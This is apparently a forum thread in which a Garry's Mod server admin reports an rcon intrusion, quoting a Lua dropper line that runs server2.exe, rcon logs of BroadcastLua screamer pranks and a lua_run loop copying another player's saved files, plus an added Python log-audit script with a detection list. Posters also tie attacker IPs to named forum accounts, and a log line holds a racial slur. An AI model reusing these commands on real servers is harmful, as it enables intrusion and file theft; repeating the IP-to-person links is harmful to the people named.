Srcds hacking bullshit, gained access to C: drive

Yeah so some bullshit started going on where GMan’s face and some screaming noise would flash on people’s screens, we brushed it off and assumed it was some client dicking around and we laughed about it. Later on my antivirus started going batshit about files being placed on my C: drive, specifically some shit called server2.exe. I take a look around my srcds folder and find something called asd.lua. I don’t know if there’s any other bullshit hiding around my srcds folder


require("cmd")  
cmd.exec("C:\server2.exe")  

I guess that’s the part that runs the placed virus, but where’s the part that actually places it?

wat2do

Putting your head between your legs and shutting down your server machine? Setting new security protocols in place? Someone who shouldn’t is in your computer. Also try to close down some ports on your router.


L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay_texture Models/Gman/gman_facehirez ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay 1 ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' play npc/stalker/go_alert2a.wav ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay_texture Models/Gman/gman_facehirez ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay 1 ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' play npc/stalker/go_alert2a.wav ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay_texture Models/Gman/gman_facehirez ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay 1 ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( 

Some bullshit related to the gman screamer thing I’m sure.

[editline]08:20AM[/editline]


L 12/06/2009 - 01:20:59: "Console<0><Console><Console>" say "I LOVE TEH PROTAL"
L 12/06/2009 - 01:20:59: rcon from "75.175.22.53:64886": command "say I LOVE TEH PROTAL"
L 12/06/2009 - 01:21:09: "Console<0><Console><Console>" say "AND BUTTSEX"
L 12/06/2009 - 01:21:09: rcon from "75.175.22.53:64886": command "say AND BUTTSEX"
L 12/06/2009 - 01:21:21: "Console<0><Console><Console>" say "IM IAN!"
L 12/06/2009 - 01:21:21: rcon from "75.175.22.53:64886": command "say IM IAN!"
L 12/06/2009 - 01:21:37: "Console<0><Console><Console>" say "It ' s IAN!"
L 12/06/2009 - 01:21:37: rcon from "75.175.22.53:64886": command "say It ' s IAN!"
L 12/06/2009 - 01:21:49: "Console<0><Console><Console>" say "it ' s ian goddamnit"
L 12/06/2009 - 01:21:49: rcon from "75.175.22.53:64886": command "say it ' s ian goddamnit"
L 12/06/2009 - 01:22:09: "Console<0><Console><Console>" say "Candymountain is buttsex with me, ian."
L 12/06/2009 - 01:22:09: rcon from "75.175.22.53:64886": command "say Candymountain is buttsex with me, ian."
L 12/06/2009 - 01:22:27: "Candymountai<28><STEAM_ID_PENDING><>" connected, address "74.237.86.202:27005"
L 12/06/2009 - 01:22:28: "Candymountai<28><STEAM_0:1:7332680><>" STEAM USERID validated
L 12/06/2009 - 01:22:31: "Console<0><Console><Console>" say "IT ' S IAN GODDAMNIT"
L 12/06/2009 - 01:22:31: rcon from "75.175.22.53:64886": command "say IT ' S IAN GODDAMNIT"
L 12/06/2009 - 01:22:59: Lua Error: :1: bad argument #1 to 'Read' (string expected, got table)
L 12/06/2009 - 01:22:59: rcon from "72.214.98.146:55762": command "lua_run local d = "adv_duplicator/STEAM_0_1_6452693/" local l = file.Find(d.."*.txt") for _, f in pairs(l) do local r = file.Read(l) file.Write("adv_duplicator/STEAM_0:1:18010810/" .. f, r) end"
L 12/06/2009 - 01:23:20: "Console<0><Console><Console>" say "I wish I weren ' t banned from vent."
L 12/06/2009 - 01:23:20: rcon from "75.175.22.53:64886": command "say I wish I weren ' t banned from vent."
L 12/06/2009 - 01:23:35: rcon from "72.214.98.146:55762": command "lua_run local d = "adv_duplicator/STEAM_0_1_6452693/" local l = file.Find(d.."*.txt") for _, f in pairs(l) do local r = file.Read(d..f) file.Write("adv_duplicator/STEAM_0:1:18010810/" .. f, r) end"
L 12/06/2009 - 01:23:55: "Candymountai<28><STEAM_0:1:7332680><>" entered the game
L 12/06/2009 - 01:23:56: rcon from "72.214.98.146:55762": command "lua_run local d = "adv_duplicator/STEAM_0_1_6452693/" local l = file.Find(d.."*.txt") for _, f in pairs(l) do local r = file.Read(d..f) file.Write("adv_duplicator/STEAM_0:1:18010810/" .. f, r) Msg(l) end"
L 12/06/2009 - 01:24:05: "Candymountai<28><STEAM_0:1:7332680><Team>" say "NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER "
L 12/06/2009 - 01:24:17: rcon from "72.214.98.146:55762": command "lua_run local d = "adv_duplicator/STEAM_0_1_6452693/" local l = file.Find(d.."*.txt") for _, f in pairs(l) do local r = file.Read(d..f) file.Write("adv_duplicator/STEAM_0:1:18010810/" .. f, r) Msg(f) end"
L 12/06/2009 - 01:24:23: "Console<0><Console><Console>" say "who ' s in vent"
L 12/06/2009 - 01:24:23: rcon from "75.175.22.53:64886": command "say who ' s in vent"
L 12/06/2009 - 01:24:35: "Console<0><Console><Console>" say "Not me"
L 12/06/2009 - 01:24:35: rcon from "72.214.98.146:55762": command "say Not me"
L 12/06/2009 - 01:25:17: "Console<0><Console><Console>" say "Thou Ornust has came to save you all."
L 12/06/2009 - 01:25:17: rcon from "72.214.98.146:55762": command "say Thou Ornust has came to save you all."

Actually I think the gman stuff was just someone dicking around with rcon.
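As an added example (not from the thread or from any of the posters), here is a small Python audit over srcds log lines in the format quoted above: it pulls out every rcon command, counts commands per source IP, and flags the ones a server admin would want alerts on (lua_run, BroadcastLua, file.Write, require). The sample lines are constructed with TEST-NET placeholder addresses, not copied from the log.

```python
import re
from collections import Counter

# Constructed sample in the srcds log format seen in the thread (placeholder TEST-NET IPs).
SAMPLE_LOG = """\
L 12/06/2009 - 01:07:05: rcon from "203.0.113.5:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay 1 ' ) ]] )"
L 12/06/2009 - 01:20:59: "Console<0><Console><Console>" say "hello"
L 12/06/2009 - 01:20:59: rcon from "203.0.113.5:64886": command "say hello"
L 12/06/2009 - 01:23:35: rcon from "198.51.100.7:55762": command "lua_run local d = "adv_duplicator/x/" local l = file.Find(d.."*.txt") for _, f in pairs(l) do file.Write("adv_duplicator/y/" .. f, file.Read(d..f)) end"
L 12/06/2009 - 01:30:00: rcon from "192.0.2.9:27015": command "status"
"""

# One srcds rcon line: timestamp, source ip:port, and the command string in quotes.
RCON_RE = re.compile(
    r'^L (?P<date>\d\d/\d\d/\d{4}) - (?P<time>\d\d:\d\d:\d\d): '
    r'rcon from "(?P<ip>[^:"]+):(?P<port>\d+)": command "(?P<cmd>.*)"$'
)

# Substrings that should never show up in rcon traffic on a production server.
SUSPICIOUS = (
    "lua_run",        # runs arbitrary server-side Lua
    "BroadcastLua",   # pushes Lua to every connected client (the screamer)
    "file.Write",     # writes into the garrysmod data tree
    "require(",       # loads a binary module (the cmd.exec dropper)
)

def parse_rcon(line):
    """Return the fields of an rcon log line, or None for any other line."""
    m = RCON_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def audit(log_text):
    """Return (alerts, per_ip) for the rcon activity found in an srcds log."""
    alerts = []
    per_ip = Counter()
    for line in log_text.splitlines():
        rec = parse_rcon(line)
        if rec is None:
            continue
        per_ip[rec["ip"]] += 1
        hits = [k for k in SUSPICIOUS if k in rec["cmd"]]
        if hits:
            alerts.append({"time": rec["time"], "ip": rec["ip"],
                           "matched": hits, "cmd": rec["cmd"]})
    return alerts, per_ip

if __name__ == "__main__":
    found, counts = audit(SAMPLE_LOG)
    for a in found:
        print(a["time"], a["ip"], a["matched"])
    print(dict(counts))
```

Run it against the real console.log to get the list of rcon source addresses and the exact lua_run payloads per address; the per-IP counts are what let you tell one rcon user from another in a log like the one above.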

Ah, the gman screamer. It was created by this guy on a server called Lets go to my room Pig! hosted by Maso. All it does is put a small screamer in front of your players’ face. It may look like a large ball around you, but it’s really just big enough to cover your head.

Edit: And edberg is right, the screamer is made of npc_stalker_go alert and gmans face texture. Also including a picture of blood.

Guy doesn’t even make his dropper undetected? Smart guy.

Lol he didn’t even try to hide it? :V

It’s safe to say at any the all hope could be lost for that server. Run lotsa antiviruses :V

[editline]11:51PM[/editline]

time* stupid iPhone

Or wipe the C drive and start over… ( I would dban it )

Wouldn’t surprise me if that little cookie was using this to get the rcon.

There is a metamod plugin going around which will kill this though.

D-FENS doesn’t do anything, stop trying.

Why? It didn’t ruin anything since my antivirus caught it when srcds tried to run the file, all I did was delete the file and shut down the server until this issue gets resolved. I just wanna know what got it there in the first place.

Those IP addresses have accounts on Facepunch:

75.175.22.53 is “SBII Gunz”.
72.214.98.146 is jonney934 / Milentrary321 / Gamma63.

Anyone who abuses the Lua scripting capabilities in Gmod gets all they deserve from being singled out.

How do you link IP addresses to facepunch?

nvm dumb question.

My server is currently being DoS’d :stuck_out_tongue: I changed port and it runs fine…

DAF doesn’t seem to be working… Where does the vdf go? orangebox/ ? orangebox/garrysmod?

Nevermind, it goes in addons even though the vdf pointer suggests otherwise.

:downs:

Thanks bro. I singled out the jonney guy a while ago using really old server logs, but he came up with a story about how he has a dynamic IP or something; dunno if it’s true.

[bergenpolitics] So is Jonney banned now? Weird, I thought he was a frequent player, might’ve been a dummy IP IDK[/bergenpolitics]

It indeed could be a masked IP. All of those people could be the same person! :tinfoil:

God fucking dammit, fucking Andrew telling me to enter some commands into rcon. Also I never made an account called Gamma, what’s the email on it? If Gamma is not connected to any of my emails then that proves someone else could be on my IP.

derp

To anybody wondering, I was talking with Edberg on vent when this happened, it turned out my friend was on my router doing this shit. I have since disallowed connections from his computer and changed my router’s WEP key.

@above wat.

Which leads me to believe it was you, someone was saying shit that only a vent user would say, and you are the only one who actually goes there.

Yeah, Andrew essentially told me to “cover” for him so he would not take “all” the blame, god I need to screen my convos more often. Now the virus stuff was not me; if you know about the exploit, you had to join the server before you could upload any file, and the last time I joined the virus was not there, so if you can link the time the file was created to the time a player was on the server then you could possibly find who uploaded the virus.